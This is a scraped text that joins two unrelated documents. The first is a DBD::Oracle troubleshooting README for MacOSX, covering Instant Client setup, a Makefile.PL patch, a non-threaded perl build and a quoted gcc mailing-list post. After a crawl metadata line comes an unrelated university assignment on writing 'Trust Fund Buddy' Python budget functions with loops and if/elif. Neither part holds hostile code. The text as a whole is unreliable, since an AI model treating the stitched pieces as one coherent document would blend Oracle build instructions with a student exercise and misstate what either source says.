I highly recommend you install and use the Oracle 10g Instant Client for MacOSX 10.3. Compared to traditional Oracle client installations it is a very compact download, and it has the memory leak problem fixed. As an added benefit, you will be able to seamlessly connect to 10g databases. Even if you do want to run the database server included in the 9iR2 Developer's Release, I'd still use the Instant Client for compiling OCI applications or drivers like DBD::Oracle.
If you still decide to use the full 9iR2 DR client, and if all you use DBD::Oracle for on MacOSX is development and test scripts that don't involve running the same query multiple times or many queries within the same perl process, then note that the memory leak will most likely never affect you in a serious way. In this case you may not need to bother and instead just go ahead, build and install DBD::Oracle straightforwardly without any special measures.
That said, here are the details.
0) (If you decided for the 9iR2 DR client, skip to 1.) If you decided to use the 10g Instant Client, make sure you download and install all parts. (Given that this is perl land you may not need the JDBC driver, but why bother sorting out the 25% you may or may not ever need.) Follow the Oracle instructions and copy the contents of each part into the same destination directory. Change to this destination directory and create a symlink lib pointing to '.' (without the quotes):
$ cd </path/to/my/oracle/instantclient>
$ ln -s . lib

Also, set the environment variable ORACLE_HOME to the path to your instantclient destination directory. Makefile.PL needs it.

Now return to your DBD::Oracle download. If the version is 1.16 or less you will need to patch Makefile.PL; in later versions this may be fixed already. Apply the following patch, e.g., by cutting and pasting into a file Makefile.PL.patch and then executing

$ patch -p0 < Makefile.PL.patch

Here is the patch:

+=+=+=+=+=+=+= Cut after this line
*** Makefile.PL.orig    Fri Oct 22 02:07:04 2004
--- Makefile.PL Fri May 13 14:28:53 2005
***************
*** 1252,1257 ****
--- 1252,1258 ----
      print "Found $dir/$_\n" if $::opt_d;
      }, "$OH/rdbms", "$OH/plsql",  # oratypes.h sometimes here (eg HPUX 11.23 Itanium Oracle 9.2.0)
+     "$OH/sdk",  # Oracle Instant Client default location (10g)
      );
      @h_dir = keys %h_dir;
      print "Found header files in @h_dir.\n" if @h_dir;
***************
*** 1286,1292 ****
--- 1287,1297 ----
      open FH, ">define.sql" or warn "Can't create define.sql: $!";
      print FH "DEFINE _SQLPLUS_RELEASE\nQUIT\n";
      close FH;
+     # we need to temporarily disable login sql scripts
+     my $sqlpath = $ENV{SQLPATH};
+     delete $ENV{SQLPATH};
      my $sqlplus_release = `$sqlplus_exe -S /nolog \@define.sql 2>&1`;
+     $ENV{SQLPATH} = $sqlpath if $sqlpath;
      unlink "define.sql";
      print $sqlplus_release;
      if ($sqlplus_release =~ /^DEFINE _SQLPLUS_RELEASE = "(\d?\d)(\d\d)(\d\d)(\d\d)(\d\d)"/) {
+=+=+=+=+=+=+= Cut to the previous line

The first hunk allows Makefile.PL to find the header files which are in a subdirectory sdk, and the second temporarily disables any global and local login.sql scripts which may make the sqlplus call fail. If you don't have a local login.sql script you will most likely be fine without the second hunk.

Now run Makefile.PL and make sure you provide the -l flag:

$ perl Makefile.PL -l

If you receive some ugly error message stating that some *.mk file couldn't be found you forgot to add the -l flag.
Then continue the standard build process by running make. In DBD::Oracle versions 1.16 and earlier this will end in an error due to a failed execution of nmedit -R. Ignore this error. Move on to running the tests, making sure the test scripts can log in to your database (e.g., by setting ORACLE_USERID). Note that by default the Instant Client does not have a network/admin/tnsnames.ora installed. Either install a suitable one, or point TNS_ADMIN to the directory where you keep your tnsnames.ora, or include the full SQLNET connection string in ORACLE_USERID. All three options are documented by Oracle in the README_IC.htm file that comes with the Instant Client, so be sure you read it if you don't understand what I'm writing here. All tests should succeed. Complete with make install. You are done! Skip the other steps below; they do NOT apply to the Instant Client. (Although of course you may still install a later version of perl if you have the need.)
1) Until the reason for the memory leak has been found and fixed, you need to remove the condition that exposes it. Apparently, this is multi-threading being enabled in Perl. The Perl 5.8.1RC3 that comes with Panther was compiled with multi-threading enabled, and AFAIK it cannot be turned off at runtime. Note that the problem is independent of whether you run multiple concurrent threads or not.
Therefore, the solution is to build your own perl. I leave it up to you whether you want to replace the system perl or not. At least Perl 5.8.x comes with instructions as to how to replace the system perl on MacOS X, and what the caveats and risks are. I used 5.8.4, installed in /usr/local, and it worked perfectly fine. The key when configuring your custom build of perl is to disable multi-threading (usethreads, useithreads, and usemultiplicity options). More precisely, do not enable them, as they are disabled by default, at least up to version 5.8.5. You can check whether threads are enabled or not by passing -V to the Perl interpreter:

$ /path/to/your/perl -V | grep usethreads

You need to see a line saying, among other things, usethreads=undef. If you see usethreads=define then multi-threading is enabled.
2) If you choose not to replace the system perl, make sure that when you build DBI and DBD::Oracle you provide the full path to your own perl when running Makefile.PL, like so (assuming you installed in /usr/local, which is the default):
$ /usr/local/bin/perl Makefile.PL

Also, every time you run a DBD::Oracle script, you must use the full path too, unless your custom-built perl comes before the system perl in the PATH environment. The easiest way to ensure you are using the right perl is to uninstall DBI from the system perl if you did install it under that as well.
3) Continue with 3) as in instructions for Jaguar (making path substitutions for perl as discussed in 2). ======================================================================
If you have any problems then follow the instructions in the README. Please post details of any problems (or changes you needed to make) to [email protected] and CC them to [email protected] on MacOSX specific problems. Rewrite of part of this readme, Panther instructions, and the Perl IO patch is credit to Hilmar Lapp, hlapp at gmx.net.
Earlier and original instructions thanks to: Andy Lester Steve Sapovits Tom Mornini
Date: Tue, 15 Apr 2003 16:02:17 +1000 Subject: Compilation bug in DBI on OSX with threaded Perl 5.8.0 From: Danial Pearce
In regards to a previous message on this list:
I have some more info:
I have compiled and installed Perl just fine with threads enabled:
./Configure -de -Dusethreads -Dprefix=/usr
make
make test
sudo make install
I have then successfully installed Apache and mod_perl as well.
When I try to compile and install DBI, I get a bus error, just like the people on this list have previously discussed on the thread above.
If I unpack the DBI and run perl Makefile.PL, then alter the created Makefile so that it uses gcc2 rather than just "cc", then it compiles, installs and runs just fine.
The issue here is that Apple have just recently released 10.2.4, which updates /usr/bin/{gcc3,gcc2,g++3,g++2}, and /usr/bin/cc is a symlink to /usr/bin/gcc3, so compilation of DBI under Apple's gcc3 does not work. It works fine with gcc2 however.
I had the same problem with DBD::Pg, and was able to compile and install that using the same fix.
I am unsure if this is a problem with Apple's version of gcc, or a problem with the DBI/DBD code itself. Given that all my other open source applications are compiling and installing fine, I am thinking there isn't anything Apple are going to do about it.
cheers Dan. | https://metacpan.org/pod/DBD::Oracle::Troubleshooting::Macos | CC-MAIN-2015-40 | refinedweb | 3,420 | 66.54 |
CS 302 Computer Fluency
Elaine Rich
Trust Fund Buddy
Our Python book, in Chapter 2, introduces two Trust Fund Buddy programs. For this project, we are going to make our own versions of those programs. We are going to make some changes to what the programs actually do. But, also, to make it easy for you to turn in everything you do in one module, we are going to define callable functions that perform the Trust Fund Buddy actions.
Part I
The first Trust Fund Buddy program is introduced on page 39.
1. Start by creating your own module that contains the program trust_fund_bad from the book. That program has 8 categories of expenses. Maybe your taste doesn’t run to Lamborghinis. So change the program so that it uses 8 budget categories that reflect how you would spend the trust fund money if it were yours.
2. Run the program. See if you can figure out why it gets the wrong answer.
3. Convert your code to a callable function named trust_fund_bad. See below for how to do that.
4. Call your function to make sure that it works as you expect (namely incorrectly).
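If the wrong answer you see is a suspiciously long number, the cause is most likely this (an assumption, since the book's exact code isn't reproduced here): input() always returns a string, and + applied to strings concatenates them instead of adding. A minimal sketch of the pitfall, with made-up amounts:

```python
# Hypothetical values standing in for what input() would return; input()
# always gives back a string, even when the user types digits.
car = "10000"
travel = "5000"

bad_total = car + travel              # "+" on strings concatenates them
good_total = int(car) + int(travel)   # convert first, then do arithmetic

print(bad_total)    # 100005000 -- a suspiciously huge, wrong "total"
print(good_total)   # 15000
```

If your program's "total" looks like all the digits you typed glued together, this is almost certainly what is happening.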
Part II
The second Trust Fund Buddy program is introduced on page 41.
1. In the same module, create a new function called trust_fund_good. Start with the body of your function using the code from trust_fund_good from the book. But again there are the old 8 categories of expenses. So change this second function so that it uses the budget categories you chose for Part I.
2. Call your function to make sure it works correctly.
Part III
Your rich grandfather may have set you up with a trust but he’s also given you a mean trustee who is determined to limit your expenses. He’s asked you for a budget and told you to list 20 budget categories, in descending order of how badly you want them. But he is going to decide how many of them you’re going to get. You are guaranteed that he’ll pick a number between 2 and 20.
1. In the same module, create a new function called trust_fund_monthly. Here’s its outline:
def trust_fund_monthly(n):
    """Will let you have your top n ways of spending money."""
    # fantasies is a list of money spending opportunities.
    # damages is a matching list of dollar amounts.
    fantasies = 20 * [""]   # Before we start to fantasize.
    damages = 20 * [0]      # These just create the lists.
    # Now fill in the values.
    fantasies[0] = "Extreme sports"
    damages[0] = 10000
    fantasies[1] = "truffles"
    damages[1] = 5000
    ## fill in 2 through 19
    ## print a list of the n allowable fantasies
    ## print the monthly total of the allowable fantasies
You should fill in the three sections marked with ##. In other words, you need to make your function do the following three things:
a. Fill in the lists fantasies and damages.
b. Print a list of the n allowable fantasies. (Hint: use a loop.)
c. Print the monthly total of the allowable fantasies. (Hint: use another loop.) Make sure to label this number as the monthly total.
2. Call your function to make sure it works correctly.
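In case the loop hints are opaque, here is one possible shape for the two ## sections. This is only a sketch: it is trimmed to 3 categories instead of 20, the fantasies and dollar amounts are invented, and the return statement is extra scaffolding the assignment does not ask for.

```python
# A trimmed-down sketch of trust_fund_monthly: 3 categories instead of 20,
# with made-up fantasies and dollar amounts.
fantasies = ["Extreme sports", "truffles", "yacht club dues"]
damages = [10000, 5000, 2000]

def trust_fund_monthly(n):
    """Will let you have your top n ways of spending money."""
    # print a list of the n allowable fantasies
    for i in range(n):
        print(fantasies[i])
    # print the monthly total of the allowable fantasies
    total = 0
    for i in range(n):
        total = total + damages[i]
    print("Monthly total:", total)
    return total   # the assignment only asks you to print; returning helps testing

trust_fund_monthly(2)   # prints the top 2 fantasies, then Monthly total: 15000
```

The same two-loop pattern works unchanged once fantasies and damages hold all 20 entries.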
Part IV
One month is bad enough. What about a whole year?
1. In the same module, create a new function called trust_fund_annual. It should work exactly the same as trust_fund_monthly except:
· After it prints the list of n allowable fantasies, its next output line should report the annual total (assuming that spending stays the same every month).
· It should have a final line that reports the difference between your annual spending and that of a small island country Beachland (whose annual spending is $846,678,754). If your spending is less than that of Beachland, your program should output:
You spent <amount> less than Beachland this year. Congratulations on not wasting money!
If your spending is more than that of Beachland, your program should output:
You spent <amount> more than Beachland this year. Congratulations on becoming an island nation!
If your spending is exactly equal to that of Beachland, your program should output:
You spent <amount> exactly the same amount as Beachland this year. Congratulations on becoming an island nation!
To create this line, you will need to use an if statement, as described starting on p. 53. Remember that, to check for equality, use == not simply = (which is used only as the assignment operator). Because you are considering three cases, you will probably want to use elif, which is described starting on p. 59.
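The three-way branch described above can be sketched as follows. The function name compare_to_beachland and the return statement are our own scaffolding, not part of the assignment; annual_total stands in for the yearly sum your trust_fund_annual computes.

```python
# A sketch of the three-way comparison for Part IV.
BEACHLAND = 846678754   # Beachland's annual spending, from the assignment

def compare_to_beachland(annual_total):
    # == tests equality; a single = is assignment and is not allowed here.
    if annual_total < BEACHLAND:
        diff = BEACHLAND - annual_total
        line = ("You spent " + str(diff) + " less than Beachland this year. "
                "Congratulations on not wasting money!")
    elif annual_total > BEACHLAND:
        diff = annual_total - BEACHLAND
        line = ("You spent " + str(diff) + " more than Beachland this year. "
                "Congratulations on becoming an island nation!")
    else:
        line = ("You spent " + str(annual_total) + " exactly the same amount "
                "as Beachland this year. "
                "Congratulations on becoming an island nation!")
    print(line)
    return line   # returned as well so the sketch is easy to test

compare_to_beachland(180000)   # a modest fantasy budget
```

Note that the else branch needs no condition: if the total is neither less than nor greater than Beachland's, it must be equal.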
Turning in Your Project
Use the turnin system to submit a single module with the four functions that you have written.
Defining a Function
The process of defining functions is described in the book starting on p. 161. Suppose that you have written the following code:
x = 3
y = 6
print(x+y)
To turn this code into a function that you can call, you first need to choose a name. Let’s call our function xy. Then we write:
def xy():
    x = 3
    y = 6
    print(x+y)
You can cut and paste your original code to put in your function. But remember that it must be indented one level. There are tools to do this automatically, but for short functions, the easiest thing to do is just to insert four blanks at the beginning of every line. | http://www.cs.utexas.edu/~ear/cs302/Homeworks/TrustFundBuddy.html | CC-MAIN-2017-04 | refinedweb | 938 | 73.98 |
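You can even let Python do the four-blank indenting for you: textwrap.indent from the standard library prefixes every line of a string. A small sketch using the xy example above:

```python
import textwrap

# The three original lines, joined into one string.
body = "x = 3\ny = 6\nprint(x+y)"

# textwrap.indent puts four blanks at the start of every line.
print("def xy():")
print(textwrap.indent(body, "    "))
```

Running this prints the fully indented function definition, ready to paste into your module.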